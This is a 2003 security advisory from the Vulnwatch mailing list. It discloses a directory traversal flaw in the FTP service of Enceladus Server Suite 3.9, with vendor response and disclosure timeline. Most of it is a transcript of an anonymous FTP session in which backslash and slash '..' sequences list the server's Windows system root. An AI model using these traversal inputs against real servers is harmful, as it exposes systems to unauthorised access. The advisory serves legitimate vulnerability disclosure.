Vulnwatch mailing list archives

Directory Traversal vulnerability found in Enceladus Server Suite version 3.9

From: matrix () infowarfare dk
Date: Tue, 21 Jan 2003 21:06:07 +0100
                 Directory Traversal vulnerability found in 
                      Enceladus Server Suite version 3.9
                               (FTP Service)
                                                         
                         Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY
Enceladus Server Suite is an Internet/Intranet lightweight Web and FTP Server 
for 
Windows, provides secure file sharing on any network! Perfect for Broadband, 
Cable Modem, Small business and Personal Use. You don't have to be an expert 
to 
setup file sharing or run your own web site and FTP Server!! This Server Suite 
is 
One of the Easiest To Install and Operate! 

A directory traversal vulnerability in the product allows remote attackers to 
cause 
the server to traverse into directories that reside outside the bounding 
FTP root directory. The default installation include a anonymous user where 
this can be 
used.

DETAILS

Vulnerable systems:
 Windows NT 4.0 and Windows 2000 server fully patched
 *  Enceladus Server Suite version 3.9
 
Immune systems:
 * Enceladus Web and FTP Server Suite V3.9.11

Enceladus Server Suite version 3.9 failure to filter out "\.." and "/.." 
sequences in specific command requests 
allowing a remote users to break out of restricted directories and gain read 
access 
to the system directory structure; Possibility for discovering the directory
structure outside the configured areas.


The following transcript demonstrates a sample exploitation of the 
vulnerabilities:

Connected to 192.168.1.199.
220 Mollensoft FTP Server Ready.
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
index.html
readme.txt
226 Listing complete.
ftp: 24 bytes received in 0,00Seconds 24000,00Kbytes/sec.
ftp> cd ..
550 Access denied
ftp> cd ...
550 Access denied
ftp> cd \..\
550 Access denied
ftp> cd/../
Invalid command.
ftp> cd /../
550 Access denied
ftp> ls /../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> ls /../../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> ls \..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> dir \..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 backup-html
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 cgi-bin
drwxr-xr-x  1 User     Group              0 Jan 19 10:46 config
-rwxr-xr-x  1 User     Group        1016037 Mar 21 00:34 ENCELADUSHELP.CHM
-rwxr-xr-x  1 User     Group         241664 Nov 24 23:57 EnceladusServer3.9.exe
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 html
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 logs
-rwxr-xr-x  1 User     Group          30880 Jan 19 10:45 UNINSTAL.DAT
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 users
226 Listing complete.
ftp: 619 bytes received in 0,00Seconds 619000,00Kbytes/sec.
ftp> dir \..\..\..\..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x  1 User     Group            278 Jan 18 08:49 boot.ini
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 enceladus
-rwxr-xr-x  1 User     Group        5135127 Jan 19 10:32 
EnceladusServerSuiteDemoV3.1.EXE
drwxr-xr-x  1 User     Group              0 Dec 23 12:25 I386
drwxr-xr-x  1 User     Group              0 Dec 23 22:22 Inetpub
drwxr-xr-x  1 User     Group              0 Dec 23 21:49 Installationsfiler 
til Windows Update
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 IO.SYS
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x  1 User     Group          26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x  1 User     Group         156496 Dec 23 22:30 ntldr
drwxr-xr-x  1 User     Group              0 Dec 23 12:36 OptionPack
-rwxr-xr-x  1 User     Group      524288000 Jan 19 10:35 pagefile.sys
drwxr-xr-x  1 User     Group              0 Jan 19 10:19 Program Files
drwxr-xr-x  1 User     Group              0 Dec 23 12:24 RECYCLER
drwxr-xr-x  1 User     Group              0 Jan 19 10:45 TEMP
drwxr-xr-x  1 User     Group              0 Jan 19 10:36 WINNT
226 Listing complete.
ftp: 1340 bytes received in 0,13Seconds 10,31Kbytes/sec.
ftp> dir /../../../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x  1 User     Group            278 Jan 18 08:49 boot.ini
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 enceladus
-rwxr-xr-x  1 User     Group        5135127 Jan 19 10:32 
EnceladusServerSuiteDemoV3.1.EXE
drwxr-xr-x  1 User     Group              0 Dec 23 12:25 I386
drwxr-xr-x  1 User     Group              0 Dec 23 22:22 Inetpub
drwxr-xr-x  1 User     Group              0 Dec 23 21:49 Installationsfiler 
til Windows Update
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 IO.SYS
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x  1 User     Group          26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x  1 User     Group         156496 Dec 23 22:30 ntldr
drwxr-xr-x  1 User     Group              0 Dec 23 12:36 OptionPack
-rwxr-xr-x  1 User     Group      524288000 Jan 19 10:35 pagefile.sys
drwxr-xr-x  1 User     Group              0 Jan 19 10:19 Program Files
drwxr-xr-x  1 User     Group              0 Dec 23 12:24 RECYCLER
drwxr-xr-x  1 User     Group              0 Jan 19 10:45 TEMP
drwxr-xr-x  1 User     Group              0 Jan 19 10:36 WINNT
226 Listing complete.
ftp: 1340 bytes received in 0,14Seconds 9,57Kbytes/sec.
ftp> bye
221 Goodbye.


Detection:
Enceladus Server Suite version 3.9 is vulnerable to the above-described 
attacks. 
Earlier versions may be susceptible as well. To determine if a specific 
implementation is vulnerable, experiment by following the above 
transcript. 

Vendor response:
Good thing you cant "put" or "get" any files... Thanks for the heads up, I
thought I had fixed the directory listing,. Not too much harm in getting a
directory listing (still needs to be fixed).


Support
Enceladus Web and FTP Server Suite V3.9.11
The latest version is available from  http://www.mollensoft.com/product3.htm


Disclosure timeline:
19/01/2003 Found the Vulnerability.
19/01/2003 Author notified. Send mail to support () mollensoft com
21/01/2003 Responses received from MollenSoft
21/01/2003 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix () infowarfare dk> Dennis Rand

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, 
incidental, consequential, loss of business profits or special damages. 




-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/
Current thread:

Directory Traversal vulnerability found in Enceladus Server Suite version 3.9 matrix (Jan 21)